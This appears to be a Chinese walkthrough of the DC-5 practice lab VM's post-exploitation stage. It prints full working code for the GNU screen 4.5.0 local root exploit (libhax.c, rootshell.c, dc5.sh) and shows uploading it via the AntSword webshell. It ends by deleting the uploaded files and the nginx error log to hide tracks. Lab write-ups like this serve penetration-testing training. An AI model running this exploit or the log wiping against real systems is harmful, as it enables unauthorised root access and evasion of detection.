DC-5渗透测试教程详解(下)

简介: DC-5渗透测试教程详解

后渗透测试

查看提权文件

在kali上输入python -c ‘import pty;pty.spawn(“/bin/bash”)’

6622cc823c8b4f2c85d797bd766eefb7.png


找到具有SUID的文件,文件,用来提权。find / -perm -u=s -type f 2>/dev/null

b0f90092119e444f93fb30e09959e379.png


查找EXP, 重新打开一个终端,在kali中通过命令searchsploit查看screen-4.5.0的漏洞。

0e720dcd4cf649fca8eba31a75c06a47.png


创建脚本

2764dc2bdcef45b983a0ac36bd659251.png


复制的脚本没办法直接执行,所以需要将其拆分为多个文件处理。


在kali的root文件夹下新建文件,命名为libhax.c。


将41154.sh脚本中的第一部分内容复制到libhax.c文件 。

ac25392edc544438aad2b9a115694ddf.png


将脚本中选中内容复制到libhax.c文件中。

0e478bf95e184245a064637a8f7519eb.png


在libhax.c文件中添加所选中的语句

2dc3a30632f940089a487537c5b4e8a6.png


libhax.c的内容:(第一个文件内容)


#include<stdio.h>#include<sys/types.h>#include<unistd.h>__attribute__ ((__constructor__))
voiddropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}


将libhax.c文件ctrl s保存,然后打开终端窗口,在终端窗口里执行命令

用来生成动态库文件libhax.so

gcc-fPIC-shared-ldl-olibhax.solibhax.c


在kali的root文件夹下新建文件命名为rootshell.c,用来处理脚本中的第二部分内容

将41154.sh脚本中的选中部分,复制到rootshell.c文件中

7b0c50e24e7d43fd9eed9f853abc78e0.png

在rootshell.c文件中,第二行添加语句#include<unistd.h>,在文件的倒数第二行,删掉一个多余的NULL .

rootshell.c的文件内容:(第二个文件内容)

#include<stdio.h>#include<unistd.h>intmain(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh",NULL);
}


保存并退出rootshell.c文件,在kali的终端窗口中,输入命令gcc rootshell.c –o rootshell,用来生成一个可以执行的二进制文件.

gcc-orootshellrootshell.c


将41154.sh脚本中的最后一部分内容,复制到dc5.sh文件中

dc5.sh文件内容:(最后一个文件内容):

echo"[+] Now we create our /etc/ld.so.preload file..."cd/etcumask000#becausescreen-D-m-Lld.so.preloadecho-ne"\x0a/tmp/libhax.so"#newlineneededecho"[+] Triggering..."screen-ls#screenitselfissetuid, so... 
/tmp/rootshell


在终端窗口中,按esc,再按shift + : ,窗口底部应该出现冒号,输入set ff=unix,回车

00898364065c466ca2feb991169befe1.png

在kali中复制刚刚制作好的三个文件,到Windows中的任意位置。

使用蚁剑上传文件提权

打开蚁剑,找到/tmp目录,右键上传文件

d3bad957f3eb4b78b900b519161c110c.png

65f352eebcb640f784261c690031d115 (1).png

c92aa942ede843cba3a82f69d14cec0c.png



给dc5.sh文件添加可执行权限


chmod+xdc5.sh


执行脚本 ./dc5.sh

a1d2f7ccf10f4d41bde0aa0d60f975e5.png

0f6bf6a20d0041b2ac8bdbc204135a52.png


拿到flag

2f514b10587e476db82245c5f768c32e.png


清理痕迹

删除上传的三个提权文件

删除/var/log/nginx/error.log的日志文件

渗透测试报告

使用报告文档交流在渗透测试过程踪做了哪些,如何做,以及最为重要的—客户如何修复你发现的安全漏洞与弱点。

相关文章
|
2月前
|
JSON JavaScript 测试技术
用Postman玩转电商API:一键测试+自动化请求教程
Postman 是电商 API 测试的高效工具,涵盖基础配置、自动化测试、环境管理与请求自动化,助你快速提升开发效率。
|
26天前
|
前端开发 Java jenkins
Jmeter压力测试工具全面教程和使用技巧。
JMeter是一个能够模拟高并发请求以检查应用程序各方面性能的工具,包括但不限于前端页面、后端服务及数据库系统。熟练使用JMeter不仅能够帮助发现性能瓶颈,还能在软件开发早期就预测系统在面对真实用户压力时的表现,确保软件质量和用户体验。在上述介绍的基础上,建议读者结合官方文档和社区最佳实践,持续深入学习和应用。
437 10
|
1月前
|
JSON 安全 测试技术
什么是API接口测试?这可能是全网最全的教程了!
API 是应用程序间的“中间人”,用于实现通信和数据交换。随着微服务架构的普及,API 数量激增,其质量对系统稳定性至关重要。API 测试可验证功能、性能与安全性,帮助开发者在部署前发现并修复问题,提升系统可靠性。测试内容包括请求方法、URL、请求头、请求体、响应状态码与响应数据等。常用工具如 Postman、AREX 可辅助测试,确保 API 在不同场景下的正确性与稳定性。
|
11月前
|
自然语言处理 机器人 Python
ChatGPT使用学习:ChatPaper安装到测试详细教程(一文包会)
ChatPaper是一个基于文本生成技术的智能研究论文工具,能够根据用户输入进行智能回复和互动。它支持快速下载、阅读论文,并通过分析论文的关键信息帮助用户判断是否需要深入了解。用户可以通过命令行或网页界面操作,进行论文搜索、下载、总结等。
277 1
ChatGPT使用学习:ChatPaper安装到测试详细教程(一文包会)
|
10月前
|
缓存 测试技术 Apache
告别卡顿!Python性能测试实战教程,JMeter&Locust带你秒懂性能优化💡
告别卡顿!Python性能测试实战教程,JMeter&Locust带你秒懂性能优化💡
271 1
|
11月前
|
安全 Linux 网络安全
Neos的渗透测试靶机练习——DC-3
Neos的渗透测试靶机练习——DC-3
134 4
|
11月前
|
安全 Shell 网络安全
Neos的渗透测试靶机练习——DC-1
Neos的渗透测试靶机练习——DC-1
170 4
|
11月前
|
缓存 测试技术 Apache
告别卡顿!Python性能测试实战教程,JMeter&Locust带你秒懂性能优化💡
【10月更文挑战第1天】告别卡顿!Python性能测试实战教程,JMeter&Locust带你秒懂性能优化💡
273 4
|
缓存 测试技术 Apache
告别卡顿!Python性能测试实战教程,JMeter&Locust带你秒懂性能优化💡
【9月更文挑战第5天】性能测试是确保应用在高负载下稳定运行的关键。本文介绍Apache JMeter和Locust两款常用性能测试工具,帮助识别并解决性能瓶颈。JMeter适用于测试静态和动态资源,而Locust则通过Python脚本模拟HTTP请求。文章详细讲解了安装、配置及使用方法,并提供了实战案例,帮助你掌握性能测试技巧,提升应用性能。通过分析测试结果、模拟并发、检查资源使用情况及代码优化,确保应用在高并发环境下表现优异。
219 5
|
安全 中间件 Shell
渗透测试-靶机DC-2-知识点总结
渗透测试-靶机DC-2-知识点总结
196 0

热门文章

最新文章